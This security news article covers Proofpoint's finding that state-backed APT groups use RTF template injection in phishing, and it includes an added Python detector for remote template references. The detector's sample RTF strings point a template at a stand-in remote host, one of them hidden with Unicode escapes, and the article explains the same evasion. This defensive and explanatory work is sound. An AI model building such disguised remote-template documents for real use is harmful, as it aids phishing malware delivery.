RTF injection technique is used by APT group in recent phishing attacks

Three state-sponsored threat actors, from China, India and Russia, are using a novel RTF (Rich Text Format) template injection technique in their recent phishing attacks.

The technique has been observed in phishing campaigns since March 2021 and was first reported by the security firm Proofpoint, which expects it to be adopted by a wider range of threat actors soon.

“RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file,” said researchers from Proofpoint.

The RTF document format was created by Microsoft, and RTF files can also be opened with WordPad and other applications shipped with operating systems. When such a file is created, an RTF template can be specified that defines the text formatting of the document. These templates are meant to be hosted locally, but threat actors have abused this feature to retrieve malicious content from a remote URL instead of a local file.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.”

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

To evade static detection signatures in anti-virus engines, threat actors have encoded the injected URL as 16-bit Unicode escape sequences instead of a plaintext string. As with XML-based Office remote template documents, when the RTF file is opened through Microsoft Word the resource at the specified URL is retrieved before the content of the file is displayed.
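The two paragraphs above describe what a defender needs to look for: a `{\*\template ...}` destination whose target, once any `\uNNNN` Unicode escapes are decoded, is a remote URL rather than a local path. The following Python is an added detection example written for this article; it is not code from Proofpoint or from the report. It decodes the RTF text escapes inside the template group and flags targets that begin with a network scheme or UNC prefix. The three RTF snippets and the `template-host.invalid` hostname are constructed sample inputs, not samples from the campaigns.

```python
import re
import sys
from typing import Optional

# The "{\*\template ...}" destination group. The body may contain escaped
# braces/backslashes ("\}", "\\"), so allow a backslash plus any character.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\b(?P<body>(?:\\.|[^\\}])*)\}", re.S)

# Tokenizer for RTF text inside a group. Alternatives, in order:
#   \uN  + optional fallback char : 16-bit Unicode escape (the evasion in the article)
#   \'hh                          : 8-bit hex escape (code page character)
#   \\ \{ \}                      : escaped literal characters
#   \word[-N][ ]                  : any other control word (formatting, dropped)
#   \x                            : any other control symbol (dropped)
#   line breaks                   : not document text, dropped
#   anything else                 : literal text
_TOKEN = re.compile(
    r"\\u(-?\d+)[ ]?(?:\\'[0-9a-fA-F]{2}|[^\\{}])?"
    r"|\\'([0-9a-fA-F]{2})"
    r"|\\([\\{}])"
    r"|\\[a-zA-Z]+-?\d*[ ]?"
    r"|\\."
    r"|(\r?\n)"
    r"|(.)",
    re.S,
)

# Prefixes that mean the template is fetched over the network (UNC included).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")


def decode_rtf_text(body: str) -> str:
    """Turn the raw RTF text of a group into the string an RTF reader would see."""
    out = []
    for m in _TOKEN.finditer(body):
        uni, hx, lit, _newline, ch = m.groups()
        if uni is not None:
            # \uN carries a signed 16-bit value; negative values wrap around.
            out.append(chr(int(uni) % 0x10000))
        elif hx is not None:
            out.append(bytes.fromhex(hx).decode("cp1252", errors="replace"))
        elif lit is not None:
            out.append(lit)
        elif ch is not None:
            out.append(ch)
        # control words, control symbols and line breaks are dropped
    return "".join(out).strip()


def extract_template_target(rtf: str) -> Optional[str]:
    """Return the decoded template target, or None if the file names no template."""
    m = TEMPLATE_GROUP.search(rtf)
    if m is None:
        return None
    return decode_rtf_text(m.group("body"))


def is_remote_template(rtf: str) -> bool:
    """True when the document would pull its template from a URL or UNC share."""
    target = extract_template_target(rtf)
    return target is not None and target.lower().startswith(REMOTE_PREFIXES)


# Constructed sample documents (not from the report). ".invalid" is a reserved TLD.
SAMPLE_LOCAL = (
    r"{\rtf1\ansi\deff0{\*\template C:\\Users\\me\\Templates\\Normal.dotm}"
    r"{\fonttbl{\f0 Calibri;}}Hello\par}"
)
SAMPLE_REMOTE_PLAIN = (
    r"{\rtf1\ansi\deff0{\*\template http://template-host.invalid/doc.dotm}Hello\par}"
)
# Same target, with "http://" written as \u escapes so a plain-text URL signature misses it.
SAMPLE_REMOTE_UNICODE = (
    r"{\rtf1\ansi\uc1\deff0{\*\template \u104?\u116?\u116?\u112?\u58?\u47?\u47?"
    r"template-host.invalid/doc.dotm}Hello\par}"
)


if __name__ == "__main__":
    # Scan files given on the command line; with none, run the constructed samples.
    inputs = {p: open(p, "rb").read().decode("latin-1") for p in sys.argv[1:]} or {
        "SAMPLE_LOCAL": SAMPLE_LOCAL,
        "SAMPLE_REMOTE_PLAIN": SAMPLE_REMOTE_PLAIN,
        "SAMPLE_REMOTE_UNICODE": SAMPLE_REMOTE_UNICODE,
    }
    for name, data in inputs.items():
        verdict = "REMOTE TEMPLATE" if is_remote_template(data) else "ok"
        print(f"{name}: {verdict} -> {extract_template_target(data)!r}")
```

Reading files as latin-1 keeps every byte addressable while the regexes work on text; the only sensitive decoding happens in `decode_rtf_text`. The check deliberately decodes before matching, which is the step a byte-level signature on `http://` skips, and it treats UNC paths as remote for the same reason as URLs.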

Figure: URL hiding with Unicode-escaped characters (Source: Proofpoint)

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.”

“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape. Ultimately this is a technique poised for wider adoption in the threat landscape beyond targeted phishing attacks with likely adopters being crimeware actors,” concludes the report.